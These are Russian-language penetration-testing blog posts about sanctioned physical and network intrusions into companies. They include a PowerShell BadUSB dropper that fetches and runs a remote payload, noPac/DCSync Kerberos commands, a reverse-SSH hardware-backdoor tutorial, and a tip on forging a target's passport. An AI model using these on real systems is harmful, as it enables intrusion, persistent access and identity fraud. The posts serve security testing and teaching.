По итогу Заказчика расковыряли как снаружи, так и изнутри. Заказчику было интересно поработать с нами и провести такой детальный и подробнейший аудит безопасности, в ходе которого были обнаружены интересные уязвимости веба снаружи периметра и типовые уязвимости внутри инфраструктуры. На Взлом компании со всех сторон ушло около 7 часов, полное завершение этапа анализа защищенности произошло по окончанию 10 дней. На этом этапе, мы с командой повторно выехали к заказчику и в сопровождении провели полный аудит физической безопасности.

Надеюсь вам понравилось, спасибо за внимание!

Ещё больше интересного в моем ТГ канале: https://t.me/pro_pentest

Всем привет! Давно не было статеек, все руки тянутся перевести контент в видео формат, который и послушать можно и посмотреть на фоне. Если вы кстати не против, напишите в комментарии.

Сегодня речь пойдет про взлом компании в отрасли энергетики.

День Х.

На объекте стояла замечательный терминал по выдаче пропусков

Если вы не знакомы с такой системой то вкратце для получения временного пропуска ваши данные заносят в систему. По прибытию на объект в специальном терминале сканируется паспорт и выдается пластиковая карта. В случае с постоянным пропуском вы можете стянуть паспорт таргета, сдлеать его в хорошем качестве (либо нейронки либо фотошоп в помощь) и зайти под ним, как легальный сотрудник.

OSINT

Если вы не сталкивались с документами наизнанку в социальных сетях, то советую поресерчить в этом направлении. Хотя в свое время знакомые осинтеры мне показывали целые базы с паспортами, снилсами, страховками и прочими документами. Короче кто ищет - тот всегда найдет.

Вот простой пример такой находки - чувак решил поделиться радостной новостью о приобритении новой машины:

Отвлекаясь от темы документов и опираясь на тему находок, обнаружил как-то в гостевой зоне ключ со дня открытия, которой затесался на ряду с корпоративными фотками. (Отмычки не панацея. Внимательность - ключ ко всем дверям) Хотя на самом деле и рисунок ключа не сильно сложный :)

Bypass терминала СКУД

Так я немного отвлекся. Короче терминал, паспорт пропуск. Коллеги, если у вас стоит такая штука - то не факт что к вам пройти нельзя. Да, она защищает от копирования/кражи пропуска на улице или в общественном транспорте, но не лишает возможности пойти более сложным путем и заполучить заветную карту.

На этапе проверки была получена обычная HID карточка (скан паспорта внутреннего сотрудника с экрана смартфона), теперь задача пройти сам СКУД. Там был установлен экран куда сотрудники смотрели перед тем, как разблокируется вертушка. Оказывается это был "градусник" - поэтому тут без проблем.

Initial Access

Дальше задачей было найти укромное место, где можно было ткнуться в сетевую розетку. Обычно такие места располагаются в опенспейсах, где сотрудники могли не выйти на работу в силу своего гибридного графика.

Было найдено такое место рядом с принтером.

Далее нужно было обойти портсек, но и этого не потребовалось, сетевая розетка была доступна для работы из "коробки".

Внутряк - настало твое время!

Начинается стандартные процедуры по обследованию сети. Black box подразумевает ручной лут учеток. Но к сожалению данные действия не привели исполнителя к положительному результату. Но тильтовать рано впереди еще много проверок без наличия УЗ. Пока сеть стояла на сканировании, исполнитель пошел искать доступные способы стиллинга учетных записей. Откуда? Правильно! Надо найти чей-нибудь рабочий ПК и стянуть хешики из SAM, SYSTEM, SECURITY (вдруг повезет и заваляются креды Админа). Короче был найден ПК, но обойти BIOS не удалось. Были еще рабочие станции в кабинете, но там существовала необходимость применять слесарный инструмент.

По пути наименьшего сопротивления возвращаемся обратно. Скан закончен, самое время запулить в метасплоит результаты скана и выполнить базовые проверки при помощи модулей. Ряд проверок был опущен в виду того, что была вероятность заполучить быстро креды. Но в упреждение работы с msf (как правило - это может затянуться в большой инфре), исполнитель начал работать по "низко висящим фруктам" и обнаружил netntlmv1 хешик, когда дернул PetitPotam. Ура! Даже ESC8 не пришлось применять :D

На этом этапе была выставлена аппаратная закладка в виде "Малинки", прописаны маршруты и покинуто место проведения работ.

Удаленка

Теперь работы стало возможно выполнять с дедика, тоже небольшое достижение. Хэш отправился на брут после чего ничего не получилось :( Потому что пароль протух. Повторная операция "Петит потам спешит на помощь!" была выполнена успешно и теперь настало время атаки DCSync. Получены хешики, но задача была не просто взять домен, но и заползти в технологический сегмент. Тут в здание врывается собака и помогает найти админов с их тачками, где был доступ по второму сетевому интерфейсу вглубь.

Но на этом этапе "Малину" выдернули и исполнитель не смог продолжить дальнейшие работы.

Возможно тут стоило заложить пару закладок на случай их обнаружения. В целом заказчик остался довольным. Получил рекомендации по усилению защиты и красивый отчет.

Этот кейс позволил трезво оценить возможные сценарии противодействия и поработать над ошибками. Всем хорошего дня и успешных проектов!

Ещё больше интересного в моем ТГ канале: https://t.me/pro_pentest

Всем Привет! Недавно закончился интересный проект, где задачей было физически проникнуть в компанию и выполнить ряд атак на сетевую инфраструктуру.

Выражаю благодарность своим парням, которые выполняли этот долгий проект вместе со мной:

@post_gatto - автор канала fck_harder

@Romanov_ask - автор канала api_0

@KLON2000

Также хотелось поблагодарить @OZOBBOZO - подсказал с инструментом и показал пару приемов для Lock picking в контексте нашего проекта

Итак, наша задача заключалась в том, чтобы проникнуть в офис заказчика и поломать его инфраструктуру любым способом. Руки у нас были развязаны, но о проекте знал только руководитель технической дирекции.

Наш проект мы с командой разбили на несколько этапов, давайте о каждом по-подробнее:

Этап 1 - Разведка

На этом этапе мы выяснили все о компании, где она территориально располагается, какие есть у нее "дочки" и т.п. Попутно в ход идет поиск учеток в слитых базах, поиск телефонных номеров, страничек и аккаунтов в соц. сетях.

По итогу мы получили много полезной информации, но слитые учетки не подходили, как позже выяснилось, для аутентификации в домене. У нас была база телефонных номеров для проведения вишинга, подробная информация о некоторых сотрудниках - все это мы отложили на потом для социалки в случае если не получится выполнить инсайд.

Этап 2 - Разведка цели по месту расположения

На этом этапе один из сотрудников выполнил разведку рядом с офисом и частично внутри него, для того чтобы оценить:

• Какие есть вектора для проникновения в обход СКУД
• На сколько бдительно охрана наблюдает за посетителями БЦ
• Куда ведет подземный паркинг
• Сопряженные организации, через которые возможно выполнить инсайд
• Тип СКУД и возможность скопировать пропуск
• График смен охраны и график работы БЦ в целом
• Примерная оценка систем видеонаблюдения
• Различные факторы, которые могут помешать выполнить инсайд

Вдобавок к визуальной оценке, специалист сделал фото/видео регистрацию своих действий, чтобы потом можно было проанализировать различные малозаметные моменты.

Таких "вылазок" специалист совершил большое кол-во в виду того, что каждый раз находились различные препятствия для полной оценки защищенности периметра.

Этап 3 - Подготовка базовых инструментов и гаджетов

На этом этапе @post_gatto склепал различные устройства:

- Система удаленного видеонаблюдения

- Аппаратный бэкдор на основе малинки

- Bad USB

Мы это посмотрели в книге Андрея Жукова "Физические атаки с использованием хакерских устройств"

Также специалист подготовил Флипперы для работы по СКУДу и другим атакам.

В рюкзаки мы также загрузи много всякой походной штуки, которая по умолчанию у нас должна быть: слесарный инструмент, малинки, ноуты, провода, альфы, заряженные смартфоны, флешки и т.п.

Этап 4 - Первые вылазки

Этот проект оказался не таким тривиальным на первый взгляд. Мы ни как не могли получить первый пропуск. Работники носили их на шее или в кармане за толстыми пуховиками. Передвигались в курилку маленькими группами, подойти и так просто скопировать не получится без явного взаимодействия.

Я предложил команде выбрать себе целевого сотрудника и походить за ним везде, в надежде на то, что выпадет случай прижаться где-нибудь в метро или автобусе чтобы скопировать его пропускную карту.

Тогда @Romanov_ask предложил более быстрый вариант, который отработает идеально в контексте прошедших праздников:

• Арендовать ростовую фигуру зверюшки
• Купить цветов и шоколадок
• Дарить подготовленные подарки в честь празника 8 марта девушкам, которые являются сотрудницами целевой компании
• Выдавать приятный подарок по предъявлению корпоративного пропуска, который можно было скопировать через флиппер, спрятанный в лапе медведя.

Мы с командой долго думали как все обставить "красиво", но в одну вечернюю вылазку в выходной день, мы обнаружили на ресепшене пропуска, которые лежали без присмотра, охраны в этот момент не было.

@post_gatto быстро скопировал несколько штук и ушел из БЦ.

Этап 5 - Добыть пропуски на всю команду

@post_gatto разобрался пропускных карточках и смог сгенерировать несколько значений для словаря Флиппера. На последующих вылазках мы смогли добыть себе 4 валидных пропуска. Но первые скопированные со временем перестали быть активными. (это выяснилось на других этапах)

Этап 6 - Первый инсайд

В субботний вечер наша команда, которая занималась этим проектом проникла в офис заказчика минуя СКУД по валидным пропускам и начала свою работу. Мы разбежались по разным этажам и первым делом начали собирать план помещений, фотографировать модели замочных скважин, если их не удавалось вскрыть, запоминали и отмечали всю важную информацию.

В процессе проекта мы столкнулись с сложностями вскрытия различных замков, тогда мы купили себе подобные и началась история погружения в Lock picking.

До того дня я всегда вскрывал легкие замки у серверных шкафов и элементарный английский профиль в кабинетах. На помощь пришел - @OZOBBOZO и дал много важных и ценных советов, порекомендовал крутой инструмент, записал пару видео-уроков. В итоге мы с командой научились вскрывать целевые замки за недели 2, после уже взяли немного посложнее экземпляры, которые получалось открывать даже обычными скрепками, например как этого друга:

Этап 6 - Десятый инсайд

Наконец с примерно 10-й попытки нам удалось открыть целевые замки и выполнить поставленную задачу, у нас были доступы ко всем помещениям в организации, включая серверные комнаты. Оставалось несколько шагов до начала атаки на корпоративную инфраструктуру.

Этап 7 - Получение доменных кред

На этом этапе один из специалистов установил под потолком устройство, которое являлось по-сути EvilTwin Wi-Fi точкой, чтобы перехватывать пользовательскую аутентификацию. Тут нас ждал успех, мы получили несколько учеток открытым текстом, с которыми можно уже было работать дальше.

Этап 8 - Атака на корпоративную инфраструктуру

Один из спецов приступил делать внутрянку через wi-fi, а несколько других начали ходить по офису и подключаться вместо принтеров/телефонов чтобы посмотреть другие сегменты сети.

Попутно несколько пентестеров разложили гаджеты для удаленного видео-могниторинга по всему периметру офиса заказчика - это позволило контролировать охрану и людей, которые могли потенциально проявить интерес к нашим специалистам.

Этап 9 - Аппаратный бэкдор

На этом этапе пентестер оставил малинку в качестве закладки и проложил туннель до внешней VPS. Попутно были установлены в системные блоки Bad USB, что позволяло нам всегда получать доступ к некоторым машинам в сети.

Этап 10 - Взятие доменного администратора

Сама внутрянка оказалась несложной, получилось захватить домен через ESC6. Попутно были обнаружены и другие вектора атак, слабые пароли, некорректная сегментация сети, различные популярные "язвы" в инфраструктуре и т.п.

Этап 11 - Празднование победы и формирование отчета

На этом этапе мы с командой отметили очередную победу, спасибо всем кто принимал участие и советом и делом. Я сделал небольшое видео про наш проект, которое вы можете посмотреть в канале. Наш заказчик остался доволен, закрыл все свои проблемные места и теперь готов к таким вот инсайдерским атакам :)

Ещё больше интересного в моем ТГ канале: https://t.me/pro_pentest

Всем Привет! Недавно столкнулся с трудностями эксплуатации ручным способом уязвимости noPac на своих лекциях по атакам на сетевую инфраструктуру. На проектах всего пару раз использовал ручной способ, а так пользовался всегда этим эксплоитом.

Мануал по разбору данной вулны брал с хабра.

Отдельная и большая благодарность @snovvcrash за оперативную помощь в решении вопроса!

Выполнял полностью все в соотвествии с инфструкцией на тачке с HTB. Ниже перечислены шаги, которые я выполнил:

Проверяем что сервер уязвим:

Проверяем сколько тачек можем завести в домене:

Добавляем и проверяем что Машинная УЗ создалась:

Меняем название тачки при помощи скрипта:

Получаем TGT с помощью getTGT.py:

Меняем название тачки при помощи скрипта обратно:

Получаем TGS на Administrator (тут затык, пошел к автору данной статьи - @snovvcrash. Он очень быстро определил в чем была проблема, о которой будет написано немного ниже):

Выполняем Dcync:

Ничего не получается… Можете не обращать внимание на то, что вылетает у меня ошибка socket error or timeout, потому что хост был доступен, я выполнил попытку доступа через smbclient.py с машины, которая находилась в одной сети с DC, результат оставался такой же - билет невалидный:

А если я эксплуатирую при помощи эксплоита, то все отрабатывает хорошо:

Если используем noPac:

У нас кешируется билетик, который мы можем переиспользовать вручную:

Теперь время описать, что обнаружил @snovvcrash:

1. service name неправильно проставляется почему-то, префикс службы CIFS не прописывается должным образом:

Должно быть так:

1. Исследователь обнаружил, что вот в этом коммите сломали предыдущее поведение: https://github.com/ThePorgs/impacket/commit/4dc134e30c0a4011278cdda3f720f0fc1b0764e9

И теперь когда выставляешь флаг -self, надо обязательно указывать явно имя службы:

python3 examples/getST.py -dc-ip 172.16.5.5 -spn 'CIFS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' -altservice 'CIFS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' inlanefreight.local/ACADEMY-EA-DC01 -k -no-pass -impersonate administrator -self

Автор мануала вычислил это через сравнение коммитов:

1. После выполнения команды выше, где мы явно прописываем SPN и у нас валидно запрашивается билет, далее мы можем выполнять, например, DCSync атаку:

Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest

В сегодняшнем обсуждении мы сфокусируемся на анализе физического пентестинга автоматизированных систем управления технологическими процессами (АСУТП).

В рамках данного кейса, ключевым методом первичного проникновения будет применение BadUSB устройства. Отметим, что для сохранения конфиденциальности заказчика, все лица причастные к этому и сценарии действий в примере были изменены с сохранением ключевого смысла.

В процессе выполнения задачи, специалисту удалось успешно осуществить подключение BadUSB-устройства (в данном кейсе это был Flipper Zero) к компьютеру сотрудника ivanov_ii, что позволило получить удаленный доступ к системе с уровнем прав данного пользователя.

В качестве первого шага, специалист разработал и подготовил специализированный код, предназначенный для последующего выполнения на целевом компьютере.

Этап создания вредоносного кода направлен на установку удаленного соединения

При внедрении BadUSB-устройства в систему, следующий шаг процесса запускается автоматически и происходит с высокой скоростью. Данная операция, известная как действие дроппера, включает в себя загрузку ранее созданного вредоносного кода с удаленного сервера. Затем, с использованием встроенной утилиты MSBuild.exe операционной системы Windows, осуществляется инициация запуска кода. Процесс проходит незаметно: системные предупреждения не активируются, а программное обеспечение антивирусной защиты не фиксирует никаких нарушений.

powershell -w h -NoP -NonI -Ep Bypass -c "iwr http://125.125.125.125:8000/payload.xml -o C:\Users\Public\payload.xml; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Public\payload.xml"

Затем, специалист успешно осуществил подключение BadUSB устройства к рабочему компьютеру сотрудника. В результате этого действия, в правом нижнем углу экрана автоматически активировалось исполнение комбинации клавиш "Win + R", что привело к запуску предварительно заданной команды (дроппер). Реализация данной атаки, занимавшая всего 4-5 секунд, позволила исполнителю получить удаленный доступ к системе под учетной записью сотрудника, на компьютере которого было произведено подключение.

Процесс подключения BadUSB устройства к компьютеру сотрудника инициировал запрос на скачивание вредоносного кода с удаленного HTTP-сервера специалиста.

В результате активации и выполнения вредоносного кода через BadUSB, специалисту удалось инициировать сессию под учетными данными пользователя ivanov_ii.

После успешного получения прав администратора на устройстве сотрудника ivanov_ii, специалисту удалось извлечь учетные данные для всех Wi-Fi сетей, к которым это устройство ранее подключалось, в том числе и к корпоративной сети заказчика под названием Corp_WiFi.

После успешной аутентификации с использованием пароля доменной учетной записи ivanov_ii и последующего подключения к удаленному рабочему столу сотрудника, специалист выявил наличие примонтированных файловых серверов в системном проводнике с полезной и конфедециальной информацией.

Но на этом не все ведь у нас есть в распоряжении целый ПК.

В ходе тщательно спланированных операций, специалисту удалось обеспечить физический доступ к компьютеру сотрудника petrov_aa. Отсутствие пароля на BIOS и шифрования дисков открыло двери для беспрепятственной загрузки операционной системы Kali Linux, которая была специально подготовлена для этой задачи. Специалист смог смонтировать системный диск Windows и обеспечил доступ к критически важным доменным и локальным учетным записям, хранящимся на нем.

Первым шагом было выключение целевого компьютера и подключение флешки с Kali Linux. После входа в BIOS и активации опции загрузки с USB-устройств, флешка стала доступна в меню выбора приоритета загрузки, что позволило успешно загрузить Kali Linux на устройстве сотрудника.

С помощью инструмента GParted, специалист идентифицировал системный диск Windows, отформатированный в NTFS, и произвел его монтирование. Это действие открыло доступ к файловой системе Windows, где были обнаружены ключевые файлы конфигурации: SAM, SECURITY, SYSTEM, необходимые для дальнейшего извлечения учетных данных.

Доступ к этим файлам позволил специалисту извлечь ценные локальные и доменные учетные записи, обеспечив тем самым фундамент для последующих атак.

Интересным моментом стало обнаружение, что учетная запись администратора была отключена. Однако, благодаря доступу к доменной учетной записи, специалист реализовал атаку Silver Ticket, создав поддельный сервисный билет на сервис HOST с правами доменного администратора admin_ss. Это дало возможность для аутентификации по Kerberos с применением поддельного сервисного билета.

После успешной атаки, специалист изменил пароль локального администратора и активировал его учетную запись, что позволило успешно аутентифицироваться под новыми учетными данными.

Завершающим аккордом стало отключение учетной записи локального администратора и восстановление пароля администратора.

Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest

Данная статья была разработана моим коллегой Николаем Лысяковым - @KLON2000

Добрый день друзья, в статье про работы на высоте (https://teletype.in/@r00t_owl/2vFmJb4gRX6) мы (@r00t_owl и @KLON2000) говорили Вам , что мы оставили аппартаный бекдор в виде Raspberry Pi в сети заказчика и продолжали удаленно работать.

В этой статье мы опишем Вам как это сделать.

Для примера я буду показывать на обычной Kali, так как наша “малинка” в данный момент находится на проекте, но у нее все происходит аналогично.

Суть заключается в том, что вы подключаете usb-модем с заряженой симкой к ноутбуку, малинке или чему-то еше, и раземещаете устройство во внутреннюю сети заказчика. Далее настраиваете маршруты, чтобы трафик который будет идти наружу проходил через usb-модем, а трафик который будет проходить внутрь - шел через eth (по проводу). В идеале нужно еще обойти Port Security и помаксимуму замоскировать свою тачку (У каждого специалиста свое мнение на этот счет, поэтому расписывать не стал), чтобы вас не заметили в сети.

Порядок действий для создания аппаратного бэкдора:

Мы будем поднимать ssh службу, которая автоматически будет восстанавливать соединение при разрыве. И получать доступ к ней удаленно, используя хоп через VPS.

1. Для начала на нашей кали создаем файл в /etc/default/secure-tunnel@ip_or_dns_you_vps :

TARGET=ip_or_dns_you_vps
LOCAL_PORT=22
# port that will be use to ssh at remote server
REMOTE_PORT=22222
# change username
USERNAME=username
SSH_TARGET_PORT=22

2. Затем создаем файл в /etc/systemd/system/secure-tunnel@.service :

Description=Setup a secure tunnel to %I
After=network.target

[Service]
Environment="LOCAL_ADDR=localhost"
EnvironmentFile=/etc/default/secure-tunnel@%i
ExecStart=/usr/bin/ssh -NT -o ServerAliveInterval=60 -o ExitOnForwardFailure=yes -R ${REMOTE_PORT}:localhost:${LOCAL_PORT} ${USERNAME}@${TARGET}
#Это если есть авторан#Environment="AUTOSSH_GATETIME=0"
#Это если есть авторан#ExecStart=/usr/bin/autossh -M 0 -o "ExitOnForwardFailure=yes" -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -NR ${REMOTE_PORT}:${LOCAL_ADDR}:${LOCAL_PORT} -p ${SSH_TARGET_PORT} ${USERNAME}@${TARGET}

# Restart every >2 seconds to avoid StartLimitInterval failure
RestartSec=5
Restart=always
[Install]
WantedBy=multi-user.target

Здесь мы можем использовать либо просто shh, либо autossh. Я буду использовать первый вариант.

В нашем случае наша кали будет приходить на VPS и открывать 22222 порт, при обращении на который мы будем получать доступ к кали.

3. Затем вам нужно скопировать ваш открытый ключ в .ssh/known_hosts.

4. В кали вам нужно поставить права на id_rsa, от пользователя с которого будете работать(либо /home/user/.ssh либо /root/.ssh):

sudo chmod 600 id_rsa
sudo chown user:user /home/user/.ssh/id_rsa

5. Затем делаем перезапуск демона и запускаем службу:

systemctl daemon-reload
systemctl start secure-tunnel@yourjumpsshserver
systemctl status secure-tunnel@yourjumpsshserver

5.1 Если у вас будет disable and code-exited, то выполняйте команду в ручную и смотрите на каком моменте у вас крашится:

/usr/bin/ssh -Nt -o ServerALiveInterval ..... -v

5.2) Не забываем включить shh на Кали.

Когда у вас прокинутся порты, заходим на VPS и подключаемся к кали:

sudo ssh user@localhost -p 22222

Если в какой то момент вы не можете получить доступ к кали или малинке, на VPS просто убейте процесс с подключением к ней. Через пару мгновений вы увидите, что порт 22222 снова открылся.

Вот так просто и быстро.

На выходе вы получаете аппаратный бекдор к которому вы будете подключаться из любого уголка мира, который будет смотреть во внутреннюю сеть Заказчика и интернет и будет автоматически восстанавливать соединение при разрыве.

А еще я хочу порекомендовать вам канал по кибербезу, поэтому ловите ссылку – Пакет Безопасности. Там автор регулярно рассказывает об актуальных новостях из мира ИБ, обозревает полезные инструменты для безопасников и делится своим мнением.

Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest